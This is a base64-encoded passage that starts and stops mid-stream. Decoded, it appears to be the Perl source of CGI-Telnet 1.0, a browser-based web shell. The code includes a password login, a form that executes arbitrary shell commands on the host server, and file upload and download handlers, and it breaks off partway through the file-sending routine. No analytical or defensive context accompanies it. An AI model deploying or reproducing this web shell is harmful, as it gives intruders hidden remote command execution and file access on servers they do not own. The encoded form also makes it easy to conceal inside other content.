29sb3I9IiMwMDAwODAiPjxmb250IGZhY2U9IlZlcmRhbmEiIHNpemU9IjIiIGNvbG9yPSIjRkZGRkZGIj48Yj5DR0ktVGVsbmV0IFZlcnNpb24gMS4wIC0gQ29ubmVjdGVkIHRvICRTZXJ2ZXJOYW1lPC9iPjwvZm9udD48L3RkPgo8L3RyPgo8dHI+Cjx0ZCBjb2xzcGFuPSIyIiBiZ2NvbG9yPSIjQzJCRkE1Ij48Zm9udCBmYWNlPSJWZXJkYW5hIiBzaXplPSIyIj4KPGEgaHJlZj0iJFNjcmlwdExvY2F0aW9uP2E9dXBsb2FkJmQ9JEVuY29kZWRDdXJyZW50RGlyIj5VcGxvYWQgRmlsZTwvYT4gfCAKPGEgaHJlZj0iJFNjcmlwdExvY2F0aW9uP2E9ZG93bmxvYWQmZD0kRW5jb2RlZEN1cnJlbnREaXIiPkRvd25sb2FkIEZpbGU8L2E+IHwKPGEgaHJlZj0iJFNjcmlwdExvY2F0aW9uP2E9bG9nb3V0Ij5EaXNjb25uZWN0PC9hPiB8CjxhIGhyZWY9Imh0dHA6Ly93d3cucm9oaXRhYi5jb20vY2dpc2NyaXB0cy9jZ2l0ZWxuZXQuaHRtbCI+SGVscDwvYT4KPC9mb250PjwvdGQ+CjwvdHI+CjwvdGFibGU+Cjxmb250IGNvbG9yPSIjQzBDMEMwIiBzaXplPSIzIj4KRU5ECn0KCiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0KIyBQcmludHMgdGhlIExvZ2luIFNjcmVlbgojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tCnN1YiBQcmludExvZ2luU2NyZWVuCnsKCSRNZXNzYWdlID0gcSQ8cHJlPjxmb250IGNvbG9yPSIjNjY5OTk5Ij4gX19fX18gIF9fX19fICBfX19fXyAgICAgICAgICBfX19fXyAgICAgICAgXyAgICAgICAgICAgICAgIF8KLyAgX18gXHwgIF9fIFx8XyAgIF98ICAgICAgICB8XyAgIF98ICAgICAgfCB8ICAgICAgICAgICAgIHwgfAp8IC8gIFwvfCB8ICBcLyAgfCB8ICAgX19fX19fICAgfCB8ICAgIF9fXyB8IHwgXyBfXyAgICBfX18gfCB8Xwp8IHwgICAgfCB8IF9fICAgfCB8ICB8X19fX19ffCAgfCB8ICAgLyBfIFx8IHx8ICdfIFwgIC8gXyBcfCBfX3wKfCBcX18vXHwgfF9cIFwgX3wgfF8gICAgICAgICAgIHwgfCAgfCAgX18vfCB8fCB8IHwgfHwgIF9fL3wgfF8KIFxfX19fLyBcX19fXy8gXF9fXy8gICAgICAgICAgIFxfLyAgIFxfX198fF98fF98IHxffCBcX19ffCBcX198IDEuMAogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIAo8L2ZvbnQ+PGZvbnQgY29sb3I9IiNGRjAwMDAiPiAgICAgICAgICAgICAgICAgICAgICBfX19fX18gICAgICAgICAgICAgPC9mb250Pjxmb250IGNvbG9yPSIjQUU4MzAwIj7CqSAyMDAxLCBSb2hpdGFiIEJhdHJhPC9mb250Pjxmb250IGNvbG9yPSIjRkYwMDAwIj4KICAgICAgICAgICAgICAgICAgIC4tJnF1b3Q7ICAgICAgJnF1b3Q7LS4KICAgICAgICAgICAgICAgICAgLyAgICAgICAgICAgIFwKICAgICAgICAgICAgICAgICB8ICAgICAgICAgICAgICB8CiAgICAgICAgICAgICAgICAgfCwgIC4tLiAgLi0uICAsfAogICAgICAgICAgICAgICAgIHwgKShfby8gIFxvXykoIHwKICAgICAgICAgICAgICAgICB8LyAgICAgL1wgICAgIFx8CiAgICAgICAoQF8gICAgICAgKF8gICAgIF5eICAgICBfKQogIF8gICAgICkgXDwvZm9udD48Zm9udCBjb2xvcj0iIzgwODA4MCI+X19fX19fXzwvZm9udD48Zm9udCBjb2xvcj0iI0ZGMDAwMCI+XDwvZm9udD48Zm9udCBjb2xvcj0iIzgwODA4MCI+X188L2ZvbnQ+PGZvbnQgY29sb3I9IiNGRjAwMDAiPnxJSUlJSUl8PC9mb250Pjxmb250IGNvbG9yPSIjODA4MDgwIj5fXzwvZm9udD48Zm9udCBjb2xvcj0iI0ZGMDAwMCI+LzwvZm9udD48Zm9udCBjb2xvcj0iIzgwODA4MCI+X19fX19fX19fX19fX19fX19fX19fX18KPC9mb250Pjxmb250IGNvbG9yPSIjRkYwMDAwIj4gKF8pPC9mb250Pjxmb250IGNvbG9yPSIjODA4MDgwIj5AOEA4PC9mb250Pjxmb250IGNvbG9yPSIjRkYwMDAwIj57fTwvZm9udD48Zm9udCBjb2xvcj0iIzgwODA4MCI+Jmx0O19fX19fX19fPC9mb250Pjxmb250IGNvbG9yPSIjRkYwMDAwIj58LVxJSUlJSUkvLXw8L2ZvbnQ+PGZvbnQgY29sb3I9IiM4MDgwODAiPl9fX19fX19fX19fX19fX19fX19fX19fXyZndDs8L2ZvbnQ+PGZvbnQgY29sb3I9IiNGRjAwMDAiPgogICAgICAgIClfLyAgICAgICAgXCAgICAgICAgICAvIAogICAgICAgKEAgICAgICAgICAgIGAtLS0tLS0tLWAKICAgICAgICAgICAgIDwvZm9udD48Zm9udCBjb2xvcj0iI0FFODMwMCI+VyBBIFIgTiBJIE4gRzogUHJpdmF0ZSBTZXJ2ZXI8L2ZvbnQ+PC9wcmU+CiQ7CiMnCglwcmludCA8PEVORDsKPGNvZGU+ClRyeWluZyAkU2VydmVyTmFtZS4uLjxicj4KQ29ubmVjdGVkIHRvICRTZXJ2ZXJOYW1lPGJyPgpFc2NhcGUgY2hhcmFjdGVyIGlzIF5dCjxjb2RlPiRNZXNzYWdlCkVORAp9CgojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tCiMgUHJpbnRzIHRoZSBtZXNzYWdlIHRoYXQgaW5mb3JtcyB0aGUgdXNlciBvZiBhIGZhaWxlZCBsb2dpbgojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tCnN1YiBQcmludExvZ2luRmFpbGVkTWVzc2FnZQp7CglwcmludCA8PEVORDsKPGNvZGU+Cjxicj5sb2dpbjogYWRtaW48YnI+CnBhc3N3b3JkOjxicj4KTG9naW4gaW5jb3JyZWN0PGJyPjxicj4KPC9jb2RlPgpFTkQKfQoKIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQojIFByaW50cyB0aGUgSFRNTCBmb3JtIGZvciBsb2dnaW5nIGluCiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0Kc3ViIFByaW50TG9naW5Gb3JtCnsKCXByaW50IDw8RU5EOwo8Y29kZT4KPGZvcm0gbmFtZT0iZiIgbWV0aG9kPSJQT1NUIiBhY3Rpb249IiRTY3JpcHRMb2NhdGlvbiI+CjxpbnB1dCB0eXBlPSJoaWRkZW4iIG5hbWU9ImEiIHZhbHVlPSJsb2dpbiI+CmxvZ2luOiBhZG1pbjxicj4KcGFzc3dvcmQ6PGlucHV0IHR5cGU9InBhc3N3b3JkIiBuYW1lPSJwIj4KPGlucHV0IHR5cGU9InN1Ym1pdCIgdmFsdWU9IkVudGVyIj4KPC9mb3JtPgo8L2NvZGU+CkVORAp9CgojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tCiMgUHJpbnRzIHRoZSBmb290ZXIgZm9yIHRoZSBIVE1MIFBhZ2UKIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQpzdWIgUHJpbnRQYWdlRm9vdGVyCnsKCXByaW50ICI8L2ZvbnQ+PC9ib2R5PjwvaHRtbD4iOwp9CgojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tCiMgUmV0cmVpdmVzIHRoZSB2YWx1ZXMgb2YgYWxsIGNvb2tpZXMuIFRoZSBjb29raWVzIGNhbiBiZSBhY2Nlc3NlcyB1c2luZyB0aGUKIyB2YXJpYWJsZSAkQ29va2llc3snJ30KIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQpzdWIgR2V0Q29va2llcwp7CglAaHR0cGNvb2tpZXMgPSBzcGxpdCgvOyAvLCRFTlZ7J0hUVFBfQ09PS0lFJ30pOwoJZm9yZWFjaCAkY29va2llKEBodHRwY29va2llcykKCXsKCQkoJGlkLCAkdmFsKSA9IHNwbGl0KC89LywgJGNvb2tpZSk7CgkJJENvb2tpZXN7JGlkfSA9ICR2YWw7Cgl9Cn0KCiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0KIyBQcmludHMgdGhlIHNjcmVlbiB3aGVuIHRoZSB1c2VyIGxvZ3Mgb3V0CiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0Kc3ViIFByaW50TG9nb3V0U2NyZWVuCnsKCXByaW50ICI8Y29kZT5Db25uZWN0aW9uIGNsb3NlZCBieSBmb3JlaWduIGhvc3QuPGJyPjxicj48L2NvZGU+IjsKfQoKIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQojIExvZ3Mgb3V0IHRoZSB1c2VyIGFuZCBhbGxvd3MgdGhlIHVzZXIgdG8gbG9naW4gYWdhaW4KIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQpzdWIgUGVyZm9ybUxvZ291dAp7CglwcmludCAiU2V0LUNvb2tpZTogU0FWRURQV0Q9O1xuIjsgIyByZW1vdmUgcGFzc3dvcmQgY29va2llCgkmUHJpbnRQYWdlSGVhZGVyKCJwIik7CgkmUHJpbnRMb2dvdXRTY3JlZW47CgkmUHJpbnRMb2dpblNjcmVlbjsKCSZQcmludExvZ2luRm9ybTsKCSZQcmludFBhZ2VGb290ZXI7Cn0KCiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0KIyBUaGlzIGZ1bmN0aW9uIGlzIGNhbGxlZCB0byBsb2dpbiB0aGUgdXNlci4gSWYgdGhlIHBhc3N3b3JkIG1hdGNoZXMsIGl0CiMgZGlzcGxheXMgYSBwYWdlIHRoYXQgYWxsb3dzIHRoZSB1c2VyIHRvIHJ1biBjb21tYW5kcy4gSWYgdGhlIHBhc3N3b3JkIGRvZW5zJ3QKIyBtYXRjaCBvciBpZiBubyBwYXNzd29yZCBpcyBlbnRlcmVkLCBpdCBkaXNwbGF5cyBhIGZvcm0gdGhhdCBhbGxvd3MgdGhlIHVzZXIKIyB0byBsb2dpbgojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tCnN1YiBQZXJmb3JtTG9naW4gCnsKCWlmKCRMb2dpblBhc3N3b3JkIGVxICRQYXNzd29yZCkgIyBwYXNzd29yZCBtYXRjaGVkCgl7CgkJcHJpbnQgIlNldC1Db29raWU6IFNBVkVEUFdEPSRMb2dpblBhc3N3b3JkO1xuIjsKCQkmUHJpbnRQYWdlSGVhZGVyKCJjIik7CgkJJlByaW50Q29tbWFuZExpbmVJbnB1dEZvcm07CgkJJlByaW50UGFnZUZvb3RlcjsKCX0KCWVsc2UgIyBwYXNzd29yZCBkaWRuJ3QgbWF0Y2gKCXsKCQkmUHJpbnRQYWdlSGVhZGVyKCJwIik7CgkJJlByaW50TG9naW5TY3JlZW47CgkJaWYoJExvZ2luUGFzc3dvcmQgbmUgIiIpICMgc29tZSBwYXNzd29yZCB3YXMgZW50ZXJlZAoJCXsKCQkJJlByaW50TG9naW5GYWlsZWRNZXNzYWdlOwoJCX0KCQkmUHJpbnRMb2dpbkZvcm07CgkJJlByaW50UGFnZUZvb3RlcjsKCX0KfQoKIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQojIFByaW50cyB0aGUgSFRNTCBmb3JtIHRoYXQgYWxsb3dzIHRoZSB1c2VyIHRvIGVudGVyIGNvbW1hbmRzCiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0Kc3ViIFByaW50Q29tbWFuZExpbmVJbnB1dEZvcm0KewoJJFByb21wdCA9ICRXaW5OVCA/ICIkQ3VycmVudERpcj4gIiA6ICJbYWRtaW5cQCRTZXJ2ZXJOYW1lICRDdXJyZW50RGlyXVwkICI7CglwcmludCA8PEVORDsKPGNvZGU+Cjxmb3JtIG5hbWU9ImYiIG1ldGhvZD0iUE9TVCIgYWN0aW9uPSIkU2NyaXB0TG9jYXRpb24iPgo8aW5wdXQgdHlwZT0iaGlkZGVuIiBuYW1lPSJhIiB2YWx1ZT0iY29tbWFuZCI+CjxpbnB1dCB0eXBlPSJoaWRkZW4iIG5hbWU9ImQiIHZhbHVlPSIkQ3VycmVudERpciI+CiRQcm9tcHQKPGlucHV0IHR5cGU9InRleHQiIG5hbWU9ImMiPgo8aW5wdXQgdHlwZT0ic3VibWl0IiB2YWx1ZT0iRW50ZXIiPgo8L2Zvcm0+CjwvY29kZT4KRU5ECn0KCiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0KIyBQcmludHMgdGhlIEhUTUwgZm9ybSB0aGF0IGFsbG93cyB0aGUgdXNlciB0byBkb3dubG9hZCBmaWxlcwojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tCnN1YiBQcmludEZpbGVEb3dubG9hZEZvcm0KewoJJFByb21wdCA9ICRXaW5OVCA/ICIkQ3VycmVudERpcj4gIiA6ICJbYWRtaW5cQCRTZXJ2ZXJOYW1lICRDdXJyZW50RGlyXVwkICI7CglwcmludCA8PEVORDsKPGNvZGU+Cjxmb3JtIG5hbWU9ImYiIG1ldGhvZD0iUE9TVCIgYWN0aW9uPSIkU2NyaXB0TG9jYXRpb24iPgo8aW5wdXQgdHlwZT0iaGlkZGVuIiBuYW1lPSJkIiB2YWx1ZT0iJEN1cnJlbnREaXIiPgo8aW5wdXQgdHlwZT0iaGlkZGVuIiBuYW1lPSJhIiB2YWx1ZT0iZG93bmxvYWQiPgokUHJvbXB0IGRvd25sb2FkPGJyPjxicj4KRmlsZW5hbWU6IDxpbnB1dCB0eXBlPSJ0ZXh0IiBuYW1lPSJmIiBzaXplPSIzNSI+PGJyPjxicj4KRG93bmxvYWQ6IDxpbnB1dCB0eXBlPSJzdWJtaXQiIHZhbHVlPSJCZWdpbiI+CjwvZm9ybT4KPC9jb2RlPgpFTkQKfQoKIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQojIFByaW50cyB0aGUgSFRNTCBmb3JtIHRoYXQgYWxsb3dzIHRoZSB1c2VyIHRvIHVwbG9hZCBmaWxlcwojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tCnN1YiBQcmludEZpbGVVcGxvYWRGb3JtCnsKCSRQcm9tcHQgPSAkV2luTlQgPyAiJEN1cnJlbnREaXI+ICIgOiAiW2FkbWluXEAkU2VydmVyTmFtZSAkQ3VycmVudERpcl1cJCAiOwoJcHJpbnQgPDxFTkQ7Cjxjb2RlPgo8Zm9ybSBuYW1lPSJmIiBlbmN0eXBlPSJtdWx0aXBhcnQvZm9ybS1kYXRhIiBtZXRob2Q9IlBPU1QiIGFjdGlvbj0iJFNjcmlwdExvY2F0aW9uIj4KJFByb21wdCB1cGxvYWQ8YnI+PGJyPgpGaWxlbmFtZTogPGlucHV0IHR5cGU9ImZpbGUiIG5hbWU9ImYiIHNpemU9IjM1Ij48YnI+PGJyPgpPcHRpb25zOiAmbmJzcDs8aW5wdXQgdHlwZT0iY2hlY2tib3giIG5hbWU9Im8iIHZhbHVlPSJvdmVyd3JpdGUiPgpPdmVyd3JpdGUgaWYgaXQgRXhpc3RzPGJyPjxicj4KVXBsb2FkOiZuYnNwOyZuYnNwOyZuYnNwOzxpbnB1dCB0eXBlPSJzdWJtaXQiIHZhbHVlPSJCZWdpbiI+CjxpbnB1dCB0eXBlPSJoaWRkZW4iIG5hbWU9ImQiIHZhbHVlPSIkQ3VycmVudERpciI+CjxpbnB1dCB0eXBlPSJoaWRkZW4iIG5hbWU9ImEiIHZhbHVlPSJ1cGxvYWQiPgo8L2Zvcm0+CjwvY29kZT4KRU5ECn0KCiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0KIyBUaGlzIGZ1bmN0aW9uIGlzIGNhbGxlZCB3aGVuIHRoZSB0aW1lb3V0IGZvciBhIGNvbW1hbmQgZXhwaXJlcy4gV2UgbmVlZCB0bwojIHRlcm1pbmF0ZSB0aGUgc2NyaXB0IGltbWVkaWF0ZWx5LiBUaGlzIGZ1bmN0aW9uIGlzIHZhbGlkIG9ubHkgb24gVW5peC4gSXQgaXMKIyBuZXZlciBjYWxsZWQgd2hlbiB0aGUgc2NyaXB0IGlzIHJ1bm5pbmcgb24gTlQuCiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0Kc3ViIENvbW1hbmRUaW1lb3V0CnsKCWlmKCEkV2luTlQpCgl7CgkJYWxhcm0oMCk7CgkJcHJpbnQgPDxFTkQ7CjwveG1wPgo8Y29kZT4KQ29tbWFuZCBleGNlZWRlZCBtYXhpbXVtIHRpbWUgb2YgJENvbW1hbmRUaW1lb3V0RHVyYXRpb24gc2Vjb25kKHMpLgo8YnI+S2lsbGVkIGl0IQo8Y29kZT4KRU5ECgkJJlByaW50Q29tbWFuZExpbmVJbnB1dEZvcm07CgkJJlByaW50UGFnZUZvb3RlcjsKCQlleGl0OwoJfQp9CgojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tCiMgVGhpcyBmdW5jdGlvbiBpcyBjYWxsZWQgdG8gZXhlY3V0ZSBjb21tYW5kcy4gSXQgZGlzcGxheXMgdGhlIG91dHB1dCBvZiB0aGUKIyBjb21tYW5kIGFuZCBhbGxvd3MgdGhlIHVzZXIgdG8gZW50ZXIgYW5vdGhlciBjb21tYW5kLiBUaGUgY2hhbmdlIGRpcmVjdG9yeQojIGNvbW1hbmQgaXMgaGFuZGxlZCBkaWZmZXJlbnRseS4gSW4gdGhpcyBjYXNlLCB0aGUgbmV3IGRpcmVjdG9yeSBpcyBzdG9yZWQgaW4KIyBhbiBpbnRlcm5hbCB2YXJpYWJsZSBhbmQgaXMgdXNlZCBlYWNoIHRpbWUgYSBjb21tYW5kIGhhcyB0byBiZSBleGVjdXRlZC4gVGhlCiMgb3V0cHV0IG9mIHRoZSBjaGFuZ2UgZGlyZWN0b3J5IGNvbW1hbmQgaXMgbm90IGRpc3BsYXllZCB0byB0aGUgdXNlcnMKIyB0aGVyZWZvcmUgZXJyb3IgbWVzc2FnZXMgY2Fubm90IGJlIGRpc3BsYXllZC4KIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQpzdWIgRXhlY3V0ZUNvbW1hbmQKewoJaWYoJFJ1bkNvbW1hbmQgPX4gbS9eXHMqY2RccysoLispLykgIyBpdCBpcyBhIGNoYW5nZSBkaXIgY29tbWFuZAoJewoJCSMgd2UgY2hhbmdlIHRoZSBkaXJlY3RvcnkgaW50ZXJuYWxseS4gVGhlIG91dHB1dCBvZiB0aGUKCQkjIGNvbW1hbmQgaXMgbm90IGRpc3BsYXllZC4KCQkKCQkkT2xkRGlyID0gJEN1cnJlbnREaXI7CgkJJENvbW1hbmQgPSAiY2QgXCIkQ3VycmVudERpclwiIi4kQ21kU2VwLiJjZCAkMSIuJENtZFNlcC4kQ21kUHdkOwoJCWNob3AoJEN1cnJlbnREaXIgPSBgJENvbW1hbmRgKTsKCQkmUHJpbnRQYWdlSGVhZGVyKCJjIik7CgkJJFByb21wdCA9ICRXaW5OVCA/ICIkT2xkRGlyPiAiIDogIlthZG1pblxAJFNlcnZlck5hbWUgJE9sZERpcl1cJCAiOwoJCXByaW50ICI8Y29kZT4kUHJvbXB0ICRSdW5Db21tYW5kPC9jb2RlPiI7Cgl9CgllbHNlICMgc29tZSBvdGhlciBjb21tYW5kLCBkaXNwbGF5IHRoZSBvdXRwdXQKCXsKCQkmUHJpbnRQYWdlSGVhZGVyKCJjIik7CgkJJFByb21wdCA9ICRXaW5OVCA/ICIkQ3VycmVudERpcj4gIiA6ICJbYWRtaW5cQCRTZXJ2ZXJOYW1lICRDdXJyZW50RGlyXVwkICI7CgkJcHJpbnQgIjxjb2RlPiRQcm9tcHQgJFJ1bkNvbW1hbmQ8L2NvZGU+PHhtcD4iOwoJCSRDb21tYW5kID0gImNkIFwiJEN1cnJlbnREaXJcIiIuJENtZFNlcC4kUnVuQ29tbWFuZC4kUmVkaXJlY3RvcjsKCQlpZighJFdpbk5UKQoJCXsKCQkJJFNJR3snQUxSTSd9ID0gXCZDb21tYW5kVGltZW91dDsKCQkJYWxhcm0oJENvbW1hbmRUaW1lb3V0RHVyYXRpb24pOwoJCX0KCQlpZigkU2hvd0R5bmFtaWNPdXRwdXQpICMgc2hvdyBvdXRwdXQgYXMgaXQgaXMgZ2VuZXJhdGVkCgkJewoJCQkkfD0xOwoJCQkkQ29tbWFuZCAuPSAiIHwiOwoJCQlvcGVuKENvbW1hbmRPdXRwdXQsICRDb21tYW5kKTsKCQkJd2hpbGUoPENvbW1hbmRPdXRwdXQ+KQoJCQl7CgkJCQkkXyA9fiBzLyhcbnxcclxuKSQvLzsKCQkJCXByaW50ICIkX1xuIjsKCQkJfQoJCQkkfD0wOwoJCX0KCQllbHNlICMgc2hvdyBvdXRwdXQgYWZ0ZXIgY29tbWFuZCBjb21wbGV0ZXMKCQl7CgkJCXByaW50IGAkQ29tbWFuZGA7CgkJfQoJCWlmKCEkV2luTlQpCgkJewoJCQlhbGFybSgwKTsKCQl9CgkJcHJpbnQgIjwveG1wPiI7Cgl9CgkmUHJpbnRDb21tYW5kTGluZUlucHV0Rm9ybTsKCSZQcmludFBhZ2VGb290ZXI7Cn0KCiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0KIyBUaGlzIGZ1bmN0aW9uIGRpc3BsYXlzIHRoZSBwYWdlIHRoYXQgY29udGFpbnMgYSBsaW5rIHdoaWNoIGFsbG93cyB0aGUgdXNlcgojIHRvIGRvd25sb2FkIHRoZSBzcGVjaWZpZWQgZmlsZS4gVGhlIHBhZ2UgYWxzbyBjb250YWlucyBhIGF1dG8tcmVmcmVzaAojIGZlYXR1cmUgdGhhdCBzdGFydHMgdGhlIGRvd25sb2FkIGF1dG9tYXRpY2FsbHkuCiMgQXJndW1lbnQgMTogRnVsbHkgcXVhbGlmaWVkIGZpbGVuYW1lIG9mIHRoZSBmaWxlIHRvIGJlIGRvd25sb2FkZWQKIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQpzdWIgUHJpbnREb3dubG9hZExpbmtQYWdlCnsKCWxvY2FsKCRGaWxlVXJsKSA9IEBfOwoJaWYoLWUgJEZpbGVVcmwpICMgaWYgdGhlIGZpbGUgZXhpc3RzCgl7CgkJIyBlbmNvZGUgdGhlIGZpbGUgbGluayBzbyB3ZSBjYW4gc2VuZCBpdCB0byB0aGUgYnJvd3NlcgoJCSRGaWxlVXJsID1+IHMvKFteYS16QS1aMC05XSkvJyUnLnVucGFjaygiSCoiLCQxKS9lZzsKCQkkRG93bmxvYWRMaW5rID0gIiRTY3JpcHRMb2NhdGlvbj9hPWRvd25sb2FkJmY9JEZpbGVVcmwmbz1nbyI7CgkJJEh0bWxNZXRhSGVhZGVyID0gIjxtZXRhIEhUVFAtRVFVSVY9XCJSZWZyZXNoXCIgQ09OVEVOVD1cIjE7IFVSTD0kRG93bmxvYWRMaW5rXCI+IjsKCQkmUHJpbnRQYWdlSGVhZGVyKCJjIik7CgkJcHJpbnQgPDxFTkQ7Cjxjb2RlPgpTZW5kaW5nIEZpbGUgJFRyYW5zZmVyRmlsZS4uLjxicj4KSWYgdGhlIGRvd25sb2FkIGRvZXMgbm90IHN0YXJ0IGF1dG9tYXRpY2FsbHksCjxhIGhyZWY9IiREb3dubG9hZExpbmsiPkNsaWNrIEhlcmU8L2E+Lgo8L2NvZGU+CkVORAoJCSZQcmludENvbW1hbmRMaW5lSW5wdXRGb3JtOwoJCSZQcmludFBhZ2VGb290ZXI7Cgl9CgllbHNlICMgZmlsZSBkb2Vzbid0IGV4aXN0Cgl7CgkJJlByaW50UGFnZUhlYWRlcigiZiIpOwoJCXByaW50ICI8Y29kZT5GYWlsZWQgdG8gZG93bmxvYWQgJEZpbGVVcmw6ICQhPC9jb2RlPiI7CgkJJlByaW50RmlsZURvd25sb2FkRm9ybTsKCQkmUHJpbnRQYWdlRm9vdGVyOwoJfQp9CgojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tCiMgVGhpcyBmdW5jdGlvbiByZWFkcyB0aGUgc3BlY2lmaWVkIGZpbGUgZnJvbSB0aGUgZGlzayBhbmQgc2VuZHMgaXQgdG8gdGhlCiMgYnJvd3Nlciwgc28gdGhhdCBpdCBjYW4gYmUgZG93bmxvYWRlZCBieSB0aGUgdXNlci4KIyBBcmd1bWVudCAxOiBGdWxseSBxdWFsaWZpZWQgcGF0aG5hbWUgb2YgdGhlIGZpbGUgdG8gYmUgc2VudC4KIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQpzdWIgU2VuZEZpbGVUb0Jyb3dzZXIKewoJbG9jYWwoJFNlbmRGaWxlKSA9IEBfOwoJaWYob3BlbihTRU5ERklMRSwgJFNlbmRGaWxlKSkgIyBmaWxlIG9wZW5lZCBmb3IgcmVhZGluZwoJewoJCWlmKCRXaW5OVCkKCQl7CgkJCWJpbm1vZGUoU0VOREZJTEUpOwoJCQliaW5tb2RlKFNURE9VVCk7CgkJfQoJCSRGaWxlU2l6ZSA9IChzdGF0KCRTZW5kRmlsZSkpWzddOwoJCSgkRmlsZW5hbWUgPSAkU2VuZEZpbGUpID1+ICBtIShbXi9eXFxdKikkITsKCQlwcmludCAiQ29udGVudC1UeXBlOiBhcHBsaWNhdGlvbi94LXVua25vd25cbiI